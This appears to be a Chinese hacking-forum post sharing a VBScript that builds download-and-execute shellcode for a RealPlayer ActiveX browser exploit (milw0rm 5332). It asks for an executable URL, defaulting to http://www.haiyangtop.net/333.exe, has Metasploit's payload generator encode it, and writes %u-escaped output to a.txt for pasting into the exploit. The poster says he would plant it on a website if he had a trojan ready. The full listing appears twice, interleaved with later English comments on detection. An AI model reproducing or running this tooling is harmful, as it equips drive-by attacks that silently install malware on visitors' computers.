milw0rm上的,生成器
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。
http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar
以下原vbs文件:
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。
http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar
以下原vbs文件:
'
以下代码保存成vbs,双击即可
' Top-level driver: prompts for the URL of an executable, requests a
' download-and-execute payload for that URL from a remote payload-generation
' page, and reduces the returned HTML to the bare escape string kept in `code`.
' From here on every runtime error is suppressed, so a failed request or an
' unexpected response is never reported to the user.
On Error Resume Next
' Operator-supplied input; the default is the sample address from the post.
Exeurl = InputBox ( " 请输入exe的地址: " , " 输入 " , " http://www.haiyangtop.net/333.exe " )
' Query string sent to the generator: module win32_downloadexec, OPT_URL set to
' the (only partially encoded) input, NUL listed as a bad character, Alpha2
' encoder. The request is plain HTTP on port 55555, so the response is neither
' authenticated nor integrity-protected. The PAYLOADS path together with the
' MODULE/ENCODER parameters is distinctive in proxy and web-gateway logs.
url = " http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL= " & URLEncoding(Exeurl) & " &MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload "
Body = getHTTPPage(url)
' Pull the "$shellcode = ... </div></pre>" fragment out of the returned page.
Set Re = New RegExp
Re.Pattern = " (\$shellcode \=[\s\S]+</div></pre>) "
Set Matches = Re.Execute(Body)
' With no match, Body keeps the whole page and is still post-processed below.
If Matches.Count > 0 Then Body = Matches( 0 ).value
' Strips the assignment prefix, double quotes (Chr 34), CR and LF, ";", the
' closing tags and the "." characters; presumably this leaves only the \xNN
' escapes that replaceregex expects - confirm against a real response.
code = Trim ( Replace ( Replace ( replace ( Replace ( Replace ( Replace ( Replace (Body, " $shellcode = " , "" ), Chr ( 34 ), "" ), Chr ( 13 ), "" ), " ; " , "" ), " </div></pre> " , "" ), Chr ( 10 ), "" ), " . " , "" ))
' Converts byte escapes to %u form: each pair "\xAA\xBB" in str becomes
' "%uBBAA" (the $2$1 replacement swaps the two bytes). Matching is
' case-insensitive and applied to every pair in the string. A trailing unpaired
' "\xNN" does not match the pattern and is returned unchanged.
' Returns the rewritten string.
' Long runs of %uXXXX inside a script or web page are a common detection signal
' for browser-exploit content.
function replaceregex(str)
set regex = new regExp
regex.pattern = " \\x(..)\\x(..) "
regex.IgnoreCase = true
regex.global = true
' Despite its name, `matches` holds the replaced string, not a match collection.
matches = regex.replace(str, " %u$2$1 " )
replaceregex = matches
end Function
' Fetches Path with GetBody and returns the response decoded as text.
' The charset passed to BytesToBstr is hard-coded; the response's own
' Content-Type is not consulted.
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, " GB2312 " )
End Function
' Issues a GET for url through the Microsoft.XMLHTTP COM object and returns the
' raw response body (a byte array).
' Errors are suppressed inside the function, and neither the HTTP status nor the
' content type is checked, so on failure the caller receives whatever
' ResponseBody holds (possibly Empty) with no indication that something went wrong.
' A script host creating Microsoft.XMLHTTP and making outbound requests is a
' behaviour endpoint monitoring commonly alerts on.
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject ( " Microsoft.XMLHTTP " )
With Retrieval
' Third argument False = synchronous call; user name and password are empty.
.Open " Get " , url, False , "" , ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
' Decodes a byte array into a string using the character set named by Cset.
' Body: raw bytes (here the XMLHTTP ResponseBody). Cset: charset name.
' Works by writing the bytes into an ADODB.Stream in binary mode, rewinding,
' switching the stream to text mode and reading it back.
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject ( " adodb.stream " )
' Type 1 = binary stream, Mode 3 = read/write.
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
' Rewind before changing Type; the type can only be switched at position 0.
objstream.Position = 0
' Type 2 = text stream; Charset controls how the bytes are decoded.
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
' Partial URL encoder for vstrIn; returns the encoded string.
' Characters whose Asc() magnitude is below &HFF are copied through unchanged,
' so reserved characters such as "&", "=", "#", "%" and space are NOT escaped.
' Only wider (double-byte) characters are written out, as two "%XX" groups.
' The caller splices the result into a query string, so the input can add or
' override parameters of that request.
Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len (vstrIn)
ThisChr = Mid (vStrIn,aaaa, 1 )
If Abs ( Asc (ThisChr)) < & HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc (ThisChr)
' Asc() can return a negative value for double-byte characters; bring it
' back into the 0..&HFFFF range.
If innerCode < 0 Then
innerCode = innerCode + & H10000
End If
' NOTE(review): the high byte is obtained by integer division by &HFF (255)
' rather than &H100, and Hex() does not zero-pad - confirm the output for
' high bytes near &HFF and for byte values below &H10.
Hight8 = (innerCode And & HFF00) \ & HFF
Low8 = innerCode And & HFF
strReturn = strReturn & " % " & Hex (Hight8) & " % " & Hex (Low8)
End If
Next
URLEncoding = strReturn
End Function
' Output stage: writes the %u-converted string to a.txt and echoes it.
' The file is opened with mode 8 (append) and create = true, on a relative path,
' so it lands in the current working directory and repeated runs accumulate
' lines. There is no check that `code` is non-empty or that the extraction
' above actually matched. The file is a useful on-disk artifact for forensics.
set fso = CreateObject ( " scripting.filesystemobject " )
set fileS = fso.opentextfile( " a.txt " , 8 , true )
fileS.writeline replaceregex(code)
wscript.echo replaceregex(code)
' Same variable as fileS (VBScript identifiers are case-insensitive).
files.close
set fso = Nothing
' Final message: a.txt was generated; its content is meant to replace the
' shellcode1 value in the exploit referenced by the URL in the string.
wscript.echo Chr ( 13 ) & " ok,生成a.txt,请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可 "
' Top-level driver (the page repeats the listing from this point): prompts for
' the URL of an executable, requests a download-and-execute payload for that URL
' from a remote payload-generation page, and reduces the returned HTML to the
' bare escape string kept in `code`.
' From here on every runtime error is suppressed, so a failed request or an
' unexpected response is never reported to the user.
On Error Resume Next
' Operator-supplied input; the default is the sample address from the post.
Exeurl = InputBox ( " 请输入exe的地址: " , " 输入 " , " http://www.haiyangtop.net/333.exe " )
' Query string sent to the generator: module win32_downloadexec, OPT_URL set to
' the (only partially encoded) input, NUL listed as a bad character, Alpha2
' encoder. The request is plain HTTP on port 55555, so the response is neither
' authenticated nor integrity-protected. The PAYLOADS path together with the
' MODULE/ENCODER parameters is distinctive in proxy and web-gateway logs.
url = " http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL= " & URLEncoding(Exeurl) & " &MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload "
Body = getHTTPPage(url)
' Pull the "$shellcode = ... </div></pre>" fragment out of the returned page.
Set Re = New RegExp
Re.Pattern = " (\$shellcode \=[\s\S]+</div></pre>) "
Set Matches = Re.Execute(Body)
' With no match, Body keeps the whole page and is still post-processed below.
If Matches.Count > 0 Then Body = Matches( 0 ).value
' Strips the assignment prefix, double quotes (Chr 34), CR and LF, ";", the
' closing tags and the "." characters; presumably this leaves only the \xNN
' escapes that replaceregex expects - confirm against a real response.
code = Trim ( Replace ( Replace ( replace ( Replace ( Replace ( Replace ( Replace (Body, " $shellcode = " , "" ), Chr ( 34 ), "" ), Chr ( 13 ), "" ), " ; " , "" ), " </div></pre> " , "" ), Chr ( 10 ), "" ), " . " , "" ))
' Converts byte escapes to %u form: each pair "\xAA\xBB" in str becomes
' "%uBBAA" (the $2$1 replacement swaps the two bytes). Matching is
' case-insensitive and applied to every pair in the string. A trailing unpaired
' "\xNN" does not match the pattern and is returned unchanged.
' Returns the rewritten string.
' Long runs of %uXXXX inside a script or web page are a common detection signal
' for browser-exploit content.
function replaceregex(str)
set regex = new regExp
regex.pattern = " \\x(..)\\x(..) "
regex.IgnoreCase = true
regex.global = true
' Despite its name, `matches` holds the replaced string, not a match collection.
matches = regex.replace(str, " %u$2$1 " )
replaceregex = matches
end Function
' Fetches Path with GetBody and returns the response decoded as text.
' The charset passed to BytesToBstr is hard-coded; the response's own
' Content-Type is not consulted.
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, " GB2312 " )
End Function
' Issues a GET for url through the Microsoft.XMLHTTP COM object and returns the
' raw response body (a byte array).
' Errors are suppressed inside the function, and neither the HTTP status nor the
' content type is checked, so on failure the caller receives whatever
' ResponseBody holds (possibly Empty) with no indication that something went wrong.
' A script host creating Microsoft.XMLHTTP and making outbound requests is a
' behaviour endpoint monitoring commonly alerts on.
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject ( " Microsoft.XMLHTTP " )
With Retrieval
' Third argument False = synchronous call; user name and password are empty.
.Open " Get " , url, False , "" , ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
' Decodes a byte array into a string using the character set named by Cset.
' Body: raw bytes (here the XMLHTTP ResponseBody). Cset: charset name.
' Works by writing the bytes into an ADODB.Stream in binary mode, rewinding,
' switching the stream to text mode and reading it back.
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject ( " adodb.stream " )
' Type 1 = binary stream, Mode 3 = read/write.
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
' Rewind before changing Type; the type can only be switched at position 0.
objstream.Position = 0
' Type 2 = text stream; Charset controls how the bytes are decoded.
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
' Partial URL encoder for vstrIn; returns the encoded string.
' Characters whose Asc() magnitude is below &HFF are copied through unchanged,
' so reserved characters such as "&", "=", "#", "%" and space are NOT escaped.
' Only wider (double-byte) characters are written out, as two "%XX" groups.
' The caller splices the result into a query string, so the input can add or
' override parameters of that request.
Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len (vstrIn)
ThisChr = Mid (vStrIn,aaaa, 1 )
If Abs ( Asc (ThisChr)) < & HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc (ThisChr)
' Asc() can return a negative value for double-byte characters; bring it
' back into the 0..&HFFFF range.
If innerCode < 0 Then
innerCode = innerCode + & H10000
End If
' NOTE(review): the high byte is obtained by integer division by &HFF (255)
' rather than &H100, and Hex() does not zero-pad - confirm the output for
' high bytes near &HFF and for byte values below &H10.
Hight8 = (innerCode And & HFF00) \ & HFF
Low8 = innerCode And & HFF
strReturn = strReturn & " % " & Hex (Hight8) & " % " & Hex (Low8)
End If
Next
URLEncoding = strReturn
End Function
' Output stage: writes the %u-converted string to a.txt and echoes it.
' The file is opened with mode 8 (append) and create = true, on a relative path,
' so it lands in the current working directory and repeated runs accumulate
' lines. There is no check that `code` is non-empty or that the extraction
' above actually matched. The file is a useful on-disk artifact for forensics.
set fso = CreateObject ( " scripting.filesystemobject " )
set fileS = fso.opentextfile( " a.txt " , 8 , true )
fileS.writeline replaceregex(code)
wscript.echo replaceregex(code)
' Same variable as fileS (VBScript identifiers are case-insensitive).
files.close
set fso = Nothing
' Final message: a.txt was generated; its content is meant to replace the
' shellcode1 value in the exploit referenced by the URL in the string.
wscript.echo Chr ( 13 ) & " ok,生成a.txt,请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可 "